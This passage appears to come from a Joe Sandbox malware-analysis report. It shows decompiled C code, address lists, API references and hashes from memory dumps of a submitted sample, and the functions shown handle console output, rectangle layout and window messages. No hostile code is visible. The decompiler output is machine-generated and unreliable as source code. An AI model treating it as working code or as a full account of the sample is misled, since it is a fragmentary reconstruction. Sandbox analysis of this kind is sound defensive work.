							_push( &_v76);
							_t190 = E00DF5B1E();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00DDCBCE(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x00df6feb
0x00df6ff2
0x00df6ff5
0x00df6ffd
0x00df7000
0x00df700d
0x00df7010
0x00df7013
0x00df701a
0x00df7022
0x00df7025
0x00df7028
0x00df702e
0x00df7030
0x00df7037
0x00df7041
0x00df7043
0x00df7046
0x00df7049
0x00df704c
0x00df704f
0x00df7052
0x00df7058
0x00df7363
0x00df7363
0x00000000
0x00df705e
0x00df7066
0x00df7069
0x00df706f
0x00df7072
0x00df7079
0x00df7080
0x00df7083
0x00000000
0x00000000
0x00df708c
0x00df7091
0x00df7093
0x00df7096
0x00df709b
0x00df709f
0x00000000
0x00000000
0x00000000
0x00df709f
0x00df70a4
0x00df70a6
0x00df70ab
0x00df7165
0x00df716c
0x00df716d
0x00df7170
0x00df7172
0x00df7316
0x00df7318
0x00000000
0x00df731a
0x00df731a
0x00df731d
0x00df732c
0x00df7330
0x00df7331
0x00df7331
0x00000000
0x00df7335
0x00df7178
0x00df717a
0x00df7180
0x00df7183
0x00df718f
0x00df7198
0x00df71a3
0x00df71a8
0x00df71ab
0x00df71ae
0x00000000
0x00df71b4
0x00df71b4
0x00000000
0x00df71b4
0x00df71ae
0x00df70b1
0x00df70c0
0x00df70c1
0x00df70c4
0x00df70c7
0x00df70cc
0x00df72e2
0x00df72e4
0x00df72e6
0x00df72e8
0x00df72f2
0x00df72fa
0x00df72fc
0x00df72fd
0x00df7301
0x00df7304
0x00df7304
0x00df7308
0x00df7308
0x00df7308
0x00df730b
0x00df730b
0x00df730b
0x00df730d
0x00df730d
0x00df7311
0x00df70d2
0x00df70d2
0x00df70d5
0x00df70d7
0x00df70da
0x00df70dd
0x00df70e1
0x00df70e2
0x00df70e6
0x00df70e9
0x00df70ee
0x00df70f8
0x00df70fd
0x00df7100
0x00df7103
0x00df7103
0x00df7106
0x00df7109
0x00df710b
0x00df7114
0x00df7118
0x00df7119
0x00df711d
0x00df7123
0x00df712c
0x00df7139
0x00df7140
0x00df7144
0x00df714f
0x00df7154
0x00df715a
0x00000000
0x00df7160
0x00df71b7
0x00df71b8
0x00df723b
0x00df7242
0x00df724a
0x00df7252
0x00df7257
0x00df725a
0x00df725f
0x00000000
0x00df7265
0x00df727a
0x00df735a
0x00df7360
0x00000000
0x00df7280
0x00df7289
0x00df728b
0x00df7291
0x00000000
0x00df7297
0x00df729b
0x00df72d1
0x00df72d4
0x00000000
0x00df72da
0x00df72da
0x00000000
0x00df72da
0x00df729d
0x00df729f
0x00df72a1
0x00df72ba
0x00000000
0x00df72c0
0x00df72c4
0x00000000
0x00df72ca
0x00df72ca
0x00df72cd
0x00df72ce
0x00000000
0x00df72ce
0x00df72c4
0x00df72ba
0x00df729b
0x00df7291
0x00df727a
0x00df725f
0x00df715a
0x00df70cc
0x00000000
0x00df71bc
0x00df71bc
0x00df71c0
0x00df71c3
0x00df71e5
0x00df71e8
0x00df71ed
0x00df71f1
0x00df71f5
0x00df7223
0x00df7225
0x00000000
0x00df71f7
0x00df71f7
0x00df71f7
0x00df71fa
0x00df71fd
0x00df7200
0x00df7337
0x00df733a
0x00df733d
0x00df7347
0x00df7352
0x00df7357
0x00000000
0x00df7206
0x00df720d
0x00df7212
0x00df7215
0x00df7218
0x00000000
0x00df721e
0x00df721e
0x00000000
0x00df721e
0x00df7218
0x00df7200
0x00df71c5
0x00df71c9
0x00df71cc
0x00df71d1
0x00df71d7
0x00df71d9
0x00df71e0
0x00df7226
0x00df7229
0x00df722a
0x00df722f
0x00df7232
0x00df7235
0x00000000
0x00000000
0x00000000
0x00000000
0x00df7235
0x00000000
0x00df71c3
0x00df705e
0x00df7366
0x00df7366
0x00df7368
0x00df736b
0x00df736b
0x00df736b
0x00df736b
0x00df737d
0x00df737f
0x00df7380
0x00df7381
0x00df738b

APIs

GetConsoleOutputCP.KERNEL32(4EFB6839,00000000,?), ref: 00DF7028
__fassign.LIBCMT ref: 00DF720D
__fassign.LIBCMT ref: 00DF722A
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DF7272
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DF72B2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DF735A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b058fc86fca8a538cb746a25a79249aa8ab727025f1a18129891a10e7db15aa8
Instruction ID: cc6a671adff51935c517d6c3d05bd47885dc8d697f2cd96cf0e88a28eb4f237c
Opcode Fuzzy Hash: b058fc86fca8a538cb746a25a79249aa8ab727025f1a18129891a10e7db15aa8
Instruction Fuzzy Hash: 41C17CB5D0425C9FCB15CFA8D8809EDBBF5FF08304F29816AE965BB342D6319946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D5F2E2 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 465
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D5F2E2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t205;
				signed int _t208;
				signed char _t209;
				signed int _t212;
				signed int _t213;
				signed int _t233;
				intOrPtr* _t238;
				void* _t242;
				signed int _t245;
				signed char _t254;
				signed int _t270;
				intOrPtr* _t274;
				signed int _t282;
				signed char _t284;
				void* _t285;
				void* _t310;
				signed char _t318;
				void* _t319;
				signed int _t323;
				intOrPtr* _t325;
				intOrPtr* _t330;
				struct tagRECT _t345;
				signed int _t360;
				void* _t385;
				signed char _t386;
				signed char* _t389;
				signed int _t392;
				signed int _t394;
				signed int _t399;
				signed char _t400;
				intOrPtr _t414;
				void* _t420;
				long long _t432;
				long long _t433;

				_push(0x80);
				E00DDD55F(0xe107e0, __ebx, __edi, __esi);
				_t325 = __ecx;
				_t327 =  *((intOrPtr*)(__ecx + 0x88));
				_t389 =  *(_t420 + 8);
				_t402 =  *(_t420 + 0xc);
				 *(_t420 - 0x60) = _t389;
				 *(_t420 - 0x58) =  *(_t420 + 0xc);
				if( *((intOrPtr*)(__ecx + 0x88)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x60)) - 0xc)) == 0) {
					L56:
					 *_t389 =  *_t389 & 0x00000000;
					_t188 =  &(_t389[4]);
					 *_t188 = _t389[4] & 0x00000000;
					__eflags =  *_t188;
					goto L57;
				} else {
					E00D6B086(_t327, _t420 - 0x7c, 1);
					if( *((intOrPtr*)(_t420 - 0x7c)) != 0 ||  *((intOrPtr*)(_t420 - 0x78)) != 0) {
						E00CBAFB7(_t402, _t420 - 0x68, _t325 + 0x60);
						_t402 =  *( *_t325 + 0x138);
						 *0xe17a64();
						_t330 = _t325;
						if( *( *( *_t325 + 0x138))() != 0) {
							L7:
							_t205 =  *(E00D0A216(_t330, _t385, _t389, _t402, _t420 - 0x70));
							 *(_t420 - 0x54) = _t205;
							 *(_t420 - 0x4c) = _t205;
							__eflags = _t205;
							if(_t205 != 0) {
								_t318 = E00CC19ED();
								__eflags =  *(_t318 + 0x1e8);
								if( *(_t318 + 0x1e8) == 0) {
									asm("fld1");
									_t433 = st0;
									asm("fxch st0, st1");
								} else {
									_t433 =  *((long long*)(_t318 + 0x1e0));
									asm("fld1");
								}
								asm("fcompp");
								asm("fnstsw ax");
								__eflags = _t318 & 0x00000005;
								if((_t318 & 0x00000005) == 0) {
									_t319 = E00CC19ED();
									__eflags =  *(_t319 + 0x1e8);
									if( *(_t319 + 0x1e8) == 0) {
										asm("fld1");
									} else {
										_t433 =  *((long long*)(_t319 + 0x1e0));
									}
									asm("fild dword [ebp-0x4c]");
									 *((long long*)(_t420 - 0x50)) = _t433;
									 *(_t420 - 0x54) = L00DDD790(_t385);
								}
							}
							L16:
							if( *((intOrPtr*)(_t420 + 0x10)) == 0) {
								 *(_t420 - 0x20) =  *(_t420 - 0x20) & 0x00000000;
								_t392 =  *((intOrPtr*)(_t420 - 0x78)) + 6 +  *((intOrPtr*)(_t325 + 0x78));
								 *(_t420 - 0x1c) =  *(_t420 - 0x1c) & 0x00000000;
								 *(_t420 - 0x18) =  *(_t420 - 0x18) & 0x00000000;
								 *(_t420 - 0x14) =  *(_t420 - 0x14) & 0x00000000;
								 *(_t420 - 0x48) = _t392;
								 *0xe17a64();
								_t208 =  *( *( *_t325 + 0x24c))();
								__eflags = _t208;
								if(_t208 != 0) {
									_t399 = _t392 + 2;
									__eflags = _t399;
									 *(_t420 - 0x48) = _t399;
								}
								asm("movsd");
								_t209 = 0x21;
								 *(_t420 - 0x4c) = _t209;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t394 =  *(_t420 - 0x48);
								 *(_t420 - 0x2c) = _t394;
								 *0xe17a64();
								_t212 =  *( *( *_t325 + 0x24c))();
								__eflags = _t212;
								if(_t212 == 0) {
									0x821 = 0x21;
								} else {
									 *(_t420 - 0x4c) = 0x821;
								}
								_t213 =  *(_t325 + 0x154);
								__eflags = _t213 - 0xffffffff;
								if(_t213 != 0xffffffff) {
									E00CA91DA(_t325, _t325 + 0x60, _t420 - 0x6c, _t213);
									 *(_t420 - 4) = 2;
									E00CC1854( *(_t420 - 0x58), _t420 - 0x6c, _t420 - 0x30, 0x821);
									 *(_t420 - 0x2c) =  *((intOrPtr*)(_t420 - 0x64)) + _t394;
									 *((intOrPtr*)(_t420 - 0x28)) =  *((intOrPtr*)(_t420 - 0x28)) -  *(_t420 - 0x54);
									E00CA7B78(_t325 + 0x60, _t420 - 0x44,  *(_t325 + 0x154) + 1,  *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x60)) - 0xc)) -  *(_t325 + 0x154) + 1);
									 *(_t420 - 4) = 3;
									E00CC1854( *(_t420 - 0x58), _t420 - 0x44, _t420 - 0x30,  *(_t420 - 0x4c));
									 *0xe17a64();
									_t233 =  *( *( *_t325 + 0x138))();
									__eflags = _t233;
									if(_t233 != 0) {
										L45:
										_t394 = _t420 - 0x20;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										 *(_t420 - 0x1c) =  *(_t420 - 0x2c) + 2;
										_t238 = E00CBAFB7( *(_t420 - 0x58), _t420 - 0x84, _t420 - 0x44);
										_t402 =  *((intOrPtr*)(_t420 - 0x28)) -  *((intOrPtr*)(_t420 - 0x30)) -  *_t238;
										asm("cdq");
										_t241 =  *((intOrPtr*)(_t420 - 0x28)) -  *((intOrPtr*)(_t420 - 0x30)) -  *_t238 - _t385 >> 1;
										_t345 =  *((intOrPtr*)(_t420 - 0x28)) - ( *((intOrPtr*)(_t420 - 0x28)) -  *((intOrPtr*)(_t420 - 0x30)) -  *_t238 - _t385 >> 1);
										__eflags = _t345;
										 *(_t420 - 0x20) = _t345;
										L46:
										_t242 = E00CA2975(_t241,  *((intOrPtr*)(_t420 - 0x44)) - 0x10);
										_t157 = _t420 - 4;
										 *_t157 =  *(_t420 - 4) | 0xffffffff;
										__eflags =  *_t157;
										_t349 =  *(_t420 - 0x6c) - 0x10;
										E00CA2975(_t242,  *(_t420 - 0x6c) - 0x10);
										goto L47;
									}
									_t402 =  *( *_t325 + 0x24c);
									 *0xe17a64();
									_t241 =  *( *( *_t325 + 0x24c))();
									__eflags = _t241;
									if(_t241 == 0) {
										goto L46;
									}
									goto L45;
								} else {
									E00CC1854( *(_t420 - 0x58), _t325 + 0x60, _t420 - 0x30, 0x821);
									 *0xe17a64();
									_t270 =  *( *( *_t325 + 0x138))();
									__eflags = _t270;
									if(_t270 != 0) {
										L42:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t394 =  *(_t325 + 0x7c);
										_t414 =  *((intOrPtr*)(_t325 + 0x74));
										 *(_t420 - 0x1c) =  *((intOrPtr*)(_t420 - 0x64)) +  *(_t420 - 0x48) + 2;
										_t274 = E00D0A216( *(_t420 - 0x48) + 2, _t385, _t394, _t414, _t420 - 0x84);
										_t349 = _t274;
										asm("cdq");
										asm("cdq");
										_t402 = (_t394 + _t414 - _t385 >> 1) - ( *_t274 - _t385 >> 1) - 1;
										 *(_t420 - 0x20) = (_t394 + _t414 - _t385 >> 1) - ( *_t274 - _t385 >> 1) - 1;
										L47:
										_t245 = IsRectEmpty(_t420 - 0x20);
										__eflags = _t245;
										if(_t245 == 0) {
											 *(_t420 - 0x14) =  *(_t420 - 0x1c) +  *((intOrPtr*)(E00D0A216(_t349, _t385, _t394, _t402, _t420 - 0x8c) + 4));
											 *(_t420 - 0x18) =  *(_t420 - 0x20) +  *(_t420 - 0x54);
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											OffsetRect(_t420 - 0x40, 0, 1);
											_t254 = E00CC19ED();
											__eflags =  *(_t254 + 0x1e8);
											if( *(_t254 + 0x1e8) == 0) {
												asm("fld1");
												_t432 = st0;
												asm("fxch st0, st1");
											} else {
												_t432 =  *((long long*)(_t254 + 0x1e0));
												asm("fld1");
											}
											asm("fcompp");
											asm("fnstsw ax");
											__eflags = _t254 & 0x00000005;
											if(__eflags != 0) {
												_t402 = 0;
											} else {
												_t402 = 0xd;
											}
											 *(_t420 - 0x68) = 0;
											 *((intOrPtr*)(_t420 - 0x64)) = 0;
											E00D09EB6(_t385, __eflags, _t432,  *(_t420 - 0x58), _t402, _t420 - 0x40, 3, _t420 - 0x68);
											 *((intOrPtr*)(_t420 - 0x5c)) = 0;
											__eflags =  *(_t325 + 0xd4);
											 *(_t420 - 0x58) = 0;
											__eflags =  *(_t325 + 0xd4) != 0;
											E00D09EB6(_t385,  *(_t325 + 0xd4) != 0, _t432,  *(_t420 - 0x58), _t402, _t420 - 0x20, 0 |  *(_t325 + 0xd4) != 0x00000000, _t420 - 0x5c);
										}
										_t389 =  *(_t420 - 0x60);
										goto L56;
									}
									_t402 =  *( *_t325 + 0x24c);
									 *0xe17a64();
									_t349 = _t325;
									_t282 =  *( *( *_t325 + 0x24c))();
									__eflags = _t282;
									if(_t282 == 0) {
										goto L47;
									}
									goto L42;
								}
							}
							 *(_t325 + 0x154) =  *(_t325 + 0x154) | 0xffffffff;
							_t360 =  *(_t325 + 0x1a4);
							if(_t360 != 0) {
								_t386 = 0;
								 *(_t420 - 0x4c) = 0x7fff;
								 *(_t420 - 0x4c) = 0;
								__eflags = _t360;
								if(_t360 <= 0) {
									L32:
									_t284 = 0x7ffe;
									L33:
									 *_t389 = _t284;
									_t389[4] =  *((intOrPtr*)(_t420 - 0x64)) +  *((intOrPtr*)(_t420 - 0x64));
									L57:
									return E00DDD50E(_t325, _t389, _t402);
								}
								_t285 = _t325 + 0x19c;
								_t400 = 0x7fff;
								do {
									 *(_t420 - 0x6c) =  *(E00CBFD51(_t325, _t285, _t400, _t402, _t386));
									E00CA91DA(_t325, _t325 + 0x60, _t420 - 0x48,  *(E00CBFD51(_t325, _t285, _t400, _t402, _t386)));
									 *(_t420 - 4) =  *(_t420 - 4) & 0x00000000;
									 *0xe17a64();
									__eflags =  *( *( *_t325 + 0x24c))();
									if(__eflags == 0) {
										E00CA66A0(_t420 - 0x48, __eflags, 0xe22678, 0xe22674);
										E00CED950(_t420 - 0x48, __eflags, 0x26);
										E00CA66A0(_t420 - 0x48, __eflags, 0xe22674, 0xe1f238);
									}
									 *(_t420 - 0x74) =  *(E00CBAFB7( *(_t420 - 0x58), _t420 - 0x8c, _t420 - 0x48));
									E00CA7B78(_t325 + 0x60, _t420 - 0x44,  *(_t420 - 0x6c) + 1,  *((intOrPtr*)( *((intOrPtr*)(_t325 + 0x60)) - 0xc)) -  *(_t420 - 0x6c) + 1);
									 *(_t420 - 4) = 1;
									_t402 =  *( *_t325 + 0x24c);
									 *0xe17a64();
									__eflags =  *( *( *_t325 + 0x24c))();
									if(__eflags == 0) {
										_t402 = 0xe22674;
										E00CA66A0(_t420 - 0x44, __eflags, 0xe22678, 0xe22674);
										E00CED950(_t420 - 0x44, __eflags, 0x26);
										E00CA66A0(_t420 - 0x44, __eflags, 0xe22674, 0xe1f238);
									}
									_t309 =  *((intOrPtr*)(E00CBAFB7( *(_t420 - 0x58), _t420 - 0x84, _t420 - 0x44))) +  *(_t420 - 0x54);
									__eflags =  *(_t420 - 0x74) - _t309;
									if( *(_t420 - 0x74) > _t309) {
										_t309 =  *(_t420 - 0x74);
									}
									__eflags = _t309 - _t400;
									if(_t309 < _t400) {
										_t400 = _t309;
										_t309 =  *(_t420 - 0x6c);
										 *(_t325 + 0x154) =  *(_t420 - 0x6c);
									}
									_t310 = E00CA2975(_t309,  *((intOrPtr*)(_t420 - 0x44)) - 0x10);
									 *(_t420 - 4) =  *(_t420 - 4) | 0xffffffff;
									E00CA2975(_t310,  *(_t420 - 0x48) - 0x10);
									_t285 = _t325 + 0x19c;
									_t386 =  *(_t420 - 0x4c) + 1;
									 *(_t420 - 0x4c) = _t386;
									__eflags = _t386 -  *(_t325 + 0x1a4);
								} while (_t386 <  *(_t325 + 0x1a4));
								 *(_t420 - 0x4c) = _t400;
								_t284 = _t400;
								_t389 =  *(_t420 - 0x60);
								L31:
								if((_t284 & 0x00000001) == 0) {
									goto L33;
								}
								goto L32;
							}
							_t284 =  *(_t420 - 0x68);
							goto L31;
						}
						_t402 =  *( *_t325 + 0x24c);
						 *0xe17a64();
						_t330 = _t325;
						_t323 =  *( *( *_t325 + 0x24c))();
						if(_t323 != 0) {
							goto L7;
						} else {
							 *(_t420 - 0x54) =  *(_t420 - 0x54) & _t323;
							goto L16;
						}
					} else {
						goto L56;
					}
				}
			}

0x00d5f2e2
0x00d5f2ec
0x00d5f2f1
0x00d5f2f3
0x00d5f2f9
0x00d5f2fc
0x00d5f2ff
0x00d5f302
0x00d5f307
0x00d5f837
0x00d5f837
0x00d5f83a
0x00d5f83a
0x00d5f83a
0x00000000
0x00d5f31a
0x00d5f320
0x00d5f329
0x00d5f33f
0x00d5f346
0x00d5f34e
0x00d5f354
0x00d5f35a
0x00d5f379
0x00d5f382
0x00d5f384
0x00d5f387
0x00d5f38a
0x00d5f38c
0x00d5f38e
0x00d5f393
0x00d5f39a
0x00d5f3a6
0x00d5f3a8
0x00d5f3aa
0x00d5f39c
0x00d5f39c
0x00d5f3a2
0x00d5f3a2
0x00d5f3ac
0x00d5f3ae
0x00d5f3b0
0x00d5f3b3
0x00d5f3b5
0x00d5f3ba
0x00d5f3c1
0x00d5f3cb
0x00d5f3c3
0x00d5f3c3
0x00d5f3c3
0x00d5f3cd
0x00d5f3d0
0x00d5f3e1
0x00d5f3e1
0x00d5f3b3
0x00d5f3e4
0x00d5f3e8
0x00d5f584
0x00d5f58b
0x00d5f596
0x00d5f59a
0x00d5f59e
0x00d5f5a2
0x00d5f5a5
0x00d5f5ad
0x00d5f5af
0x00d5f5b1
0x00d5f5b3
0x00d5f5b3
0x00d5f5b6
0x00d5f5b6
0x00d5f5bf
0x00d5f5c2
0x00d5f5c3
0x00d5f5c8
0x00d5f5c9
0x00d5f5ca
0x00d5f5d3
0x00d5f5d6
0x00d5f5d9
0x00d5f5e1
0x00d5f5e3
0x00d5f5e5
0x00d5f5f3
0x00d5f5e7
0x00d5f5ec
0x00d5f5ec
0x00d5f5f4
0x00d5f5fa
0x00d5f5fd
0x00d5f698
0x00d5f6a8
0x00d5f6b0
0x00d5f6c0
0x00d5f6c6
0x00d5f6db
0x00d5f6ea
0x00d5f6f3
0x00d5f702
0x00d5f70a
0x00d5f70c
0x00d5f70e
0x00d5f728
0x00d5f731
0x00d5f734
0x00d5f738
0x00d5f739
0x00d5f73a
0x00d5f741
0x00d5f74f
0x00d5f757
0x00d5f75b
0x00d5f75e
0x00d5f760
0x00d5f760
0x00d5f762
0x00d5f765
0x00d5f76b
0x00d5f773
0x00d5f773
0x00d5f773
0x00d5f777
0x00d5f77a
0x00000000
0x00d5f77a
0x00d5f712
0x00d5f71a
0x00d5f722
0x00d5f724
0x00d5f726
0x00000000
0x00000000
0x00000000
0x00d5f603
0x00d5f60f
0x00d5f61e
0x00d5f626
0x00d5f628
0x00d5f62a
0x00d5f648
0x00d5f654
0x00d5f65a
0x00d5f65b
0x00d5f65c
0x00d5f65d
0x00d5f660
0x00d5f663
0x00d5f66d
0x00d5f672
0x00d5f677
0x00d5f67e
0x00d5f687
0x00d5f688
0x00d5f77f
0x00d5f783
0x00d5f789
0x00d5f78b
0x00d5f7ad
0x00d5f7b6
0x00d5f7bc
0x00d5f7bd
0x00d5f7be
0x00d5f7bf
0x00d5f7c4
0x00d5f7ca
0x00d5f7cf
0x00d5f7d5
0x00d5f7e1
0x00d5f7e3
0x00d5f7e5
0x00d5f7d7
0x00d5f7d7
0x00d5f7dd
0x00d5f7dd
0x00d5f7e7
0x00d5f7e9
0x00d5f7eb
0x00d5f7ee
0x00d5f7f5
0x00d5f7f0
0x00d5f7f2
0x00d5f7f2
0x00d5f7fa
0x00d5f803
0x00d5f80c
0x00d5f819
0x00d5f81c
0x00d5f822
0x00d5f825
0x00d5f82f
0x00d5f82f
0x00d5f834
0x00000000
0x00d5f834
0x00d5f62e
0x00d5f636
0x00d5f63c
0x00d5f63e
0x00d5f640
0x00d5f642
0x00000000
0x00000000
0x00000000
0x00d5f642
0x00d5f5fd
0x00d5f3ee
0x00d5f3f5
0x00d5f3fd
0x00d5f40c
0x00d5f40e
0x00d5f411
0x00d5f414
0x00d5f416
0x00d5f56f
0x00d5f56f
0x00d5f570
0x00d5f575
0x00d5f577
0x00d5f83e
0x00d5f845
0x00d5f845
0x00d5f41c
0x00d5f422
0x00d5f427
0x00d5f435
0x00d5f43c
0x00d5f443
0x00d5f44f
0x00d5f459
0x00d5f45b
0x00d5f46b
0x00d5f475
0x00d5f483
0x00d5f483
0x00d5f4a1
0x00d5f4b5
0x00d5f4bc
0x00d5f4c0
0x00d5f4c8
0x00d5f4d2
0x00d5f4d4
0x00d5f4d6
0x00d5f4e4
0x00d5f4ee
0x00d5f4fc
0x00d5f4fc
0x00d5f516
0x00d5f519
0x00d5f51c
0x00d5f51e
0x00d5f51e
0x00d5f521
0x00d5f523
0x00d5f525
0x00d5f527
0x00d5f52a
0x00d5f52a
0x00d5f536
0x00d5f53e
0x00d5f545
0x00d5f54d
0x00d5f553
0x00d5f554
0x00d5f557
0x00d5f557
0x00d5f563
0x00d5f566
0x00d5f568
0x00d5f56b
0x00d5f56d
0x00000000
0x00000000
0x00000000
0x00d5f56d
0x00d5f3ff
0x00000000
0x00d5f3ff
0x00d5f35e
0x00d5f366
0x00d5f36c
0x00d5f36e
0x00d5f372
0x00000000
0x00d5f374
0x00d5f374
0x00000000
0x00d5f374
0x00000000
0x00000000
0x00000000
0x00d5f329

APIs

__EH_prolog3_GS.LIBCMT ref: 00D5F2EC
IsRectEmpty.USER32 ref: 00D5F783
OffsetRect.USER32(00000001,00000000,00000001), ref: 00D5F7C4

Strings

t&, xrefs: 00D5F45D
t&, xrefs: 00D5F4D6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$EmptyH_prolog3_Offset
String ID: t&$t&
API String ID: 307044148-2915130445
Opcode ID: 98062cdd59323e544a90a672c646c45a76545d9d83243d457f3bfe53ac5bd3d5
Instruction ID: 6f081efb65652e9521d93935ef72b63e05222c2a2ebb0e5c73f2002305af2d1b
Opcode Fuzzy Hash: 98062cdd59323e544a90a672c646c45a76545d9d83243d457f3bfe53ac5bd3d5
Instruction Fuzzy Hash: 58024B71E012199FDF04DFA4C894AEEBBB9FF49301F144069EC15AB295DB30AA09CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D033FC Relevance: 9.2, APIs: 6, Instructions: 215
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D033FC(intOrPtr* __ecx, RECT* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				long _v28;
				RECT* _v32;
				void* __ebx;
				void* __ebp;
				signed int _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t94;
				RECT* _t97;
				RECT* _t98;
				intOrPtr* _t106;
				intOrPtr _t108;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t138;
				RECT* _t147;
				void* _t168;
				signed int _t172;

				_t167 = __esi;
				_t165 = __edi;
				_t164 = __edx;
				_t87 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t87 ^ _t172;
				_t89 = _a8;
				_t133 = __ecx;
				if(_t89 != 0) {
					_t164 =  *(__ecx + 0x2a4);
					_t135 = __ecx + 0x3b0;
					_push(__esi);
					_push(__edi);
					_t166 = 0;
					_v32 = _t164;
					if(_t135 == 0 || _t89 !=  *((intOrPtr*)(_t135 + 0x20))) {
						_t168 = _t133 + 0xb58;
						if(_t168 == 0 || _t89 !=  *((intOrPtr*)(_t168 + 0x20))) {
							_t136 = _t133 + 0x1300;
							if(_t136 == 0 || _t89 !=  *((intOrPtr*)(_t136 + 0x20))) {
								_t137 = _t133 + 0x1aa8;
								if(_t137 == 0 || _t89 !=  *((intOrPtr*)(_t137 + 0x20))) {
									_t138 = _t133 + 0x2250;
									if(_t138 == 0 || _t89 !=  *((intOrPtr*)(_t138 + 0x20))) {
										goto L17;
									} else {
										 *0xe17a64();
										_t94 =  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x210))))();
										if(_t94 != 0) {
											SendMessageA( *(_t94 + 0x20), 0x10, 0, 0);
										}
										goto L49;
									}
								} else {
									_t97 =  *(_t133 + 0x2a8);
									goto L32;
								}
							} else {
								 *(_t133 + 0x2a4) = _t166;
								goto L33;
							}
						} else {
							if( *((intOrPtr*)(_t133 + 0x290)) == _t166) {
								if( *((intOrPtr*)(_t133 + 0x254)) != _t166 ||  *((intOrPtr*)(_t133 + 0x258)) != _t166 ||  *((intOrPtr*)(_t133 + 0x25c)) != _t166) {
									_t105 =  *((intOrPtr*)(_t133 + 0x2b0));
									if( *((intOrPtr*)(_t133 + 0x2b0)) <  *((intOrPtr*)(_t133 + 0xbc))) {
										_t106 = E00CBFD51(_t133, _t133 + 0x94, _t166, _t168, _t105);
										_t108 =  *0xe6843c; // 0x4
										 *(_t133 + 0x2a4) =  *(_t133 + 0x2a4) + _t108 + 1 +  *((intOrPtr*)(_t133 + 0x2e0)) -  *((intOrPtr*)(_t133 + 0x2e8)) +  *((intOrPtr*)( *_t106 + 0x18)) -  *((intOrPtr*)( *_t106 + 0x10));
										 *((intOrPtr*)(_t133 + 0x2b0)) =  *((intOrPtr*)(_t133 + 0x2b0)) + 1;
									}
									goto L33;
								} else {
									_t97 = _t164 + 0x14;
									goto L32;
								}
							}
							_v24.left = _t166;
							_v24.top = _t166;
							_v24.right = _t166;
							_v24.bottom = _t166;
							GetWindowRect( *(_t133 + 0xb78),  &_v24);
							E00D06906(_t168, 1);
							_v28 = _v24.left;
							_v32 = _v24.bottom;
							if((E00CB7738(_t133) & 0x00400000) != 0) {
								_v28 = _v28 + _v24.right - _v24.left;
							}
							SendMessageA( *(_t133 + 0xb78), 0x1f, _t166, _t166);
							_t166 =  *(_t133 + 0x20);
							E00D06906(_t168, 1);
							 *0xe17a64(_v28, _v32);
							 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x2ec))))();
							if(IsWindow( *(_t133 + 0x20)) == 0) {
								goto L49;
							} else {
								E00D06906(_t133 + 0xb58, 0);
								_t89 = _a8;
								L17:
								_push(_t89);
								_t90 = E00CB3311(_t133, _t133, _t164, _t166, _a4);
								goto L18;
							}
						}
					} else {
